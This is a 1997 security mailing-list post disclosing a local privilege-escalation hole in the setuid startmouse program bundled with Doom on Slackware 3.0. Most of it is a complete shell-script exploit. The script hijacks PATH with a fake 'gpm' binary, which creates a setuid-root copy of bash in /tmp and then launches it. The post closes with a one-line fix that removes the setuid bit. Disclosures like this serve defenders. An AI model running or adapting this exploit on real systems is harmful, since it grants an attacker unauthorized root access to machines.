[49] in Best-of-Security
BoS: Security hole in Slack (startmouse - Doom) + exploit
daemon@ATHENA.MIT.EDU (Cristian VARVAS)
Thu Feb 27 07:32:15 1997
Date: Wed, 26 Feb 1997 12:04:05 +0200 (EET)
From: Cristian VARVAS <jolly@ana.utcluj.ro>
Cc: admin@utcluj.ro
In-Reply-To: <Pine.GSO.3.95.970222170637.18883A-100000@sundy.cs.pub.ro>
Reply-To: best-of-security@suburbia.net
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net
I have found a security hole in startmouse on Doom (Slack 3.0).
I made an exploit. My exploit works if you have
/usr/games/doom/startmouse with suid-flag.
---begin
#!/bin/sh
export PATH=/tmp:$PATH
# (c)1997 by jolly@utcluj.ro
#
echo '#include<stdio.h> '>>/tmp/gpm.c
echo 'void main() '>>/tmp/gpm.c
echo '{ '>>/tmp/gpm.c
echo ' seteuid(0,0); '>>/tmp/gpm.c
echo ' system("cp /bin/bash /tmp/setuid.bash"); '>>/tmp/gpm.c
echo ' system("chmod 4755 /tmp/setuid.bash"); '>>/tmp/gpm.c
echo '} '>>/tmp/gpm.c
#
cc -o /tmp/gpm /tmp/gpm.c
/usr/bin/doom
rm /tmp/gpm.c /tmp/gpm
sleep 5
/tmp/setuid.bash
---end
Solution: chmod 755 /usr/games/doom/startmouse
--------------------------------------------------------------
Technical University Cristian VARVAS <cvarvas@utcluj.ro)
of Str. M. Viteazu, Nr. 21, Ap. 50
Cluj-Napoca RO 2400 SIBIU
Data Communication Center tel +40(0)69-420418,fax 213901
--------------------------------------------------------------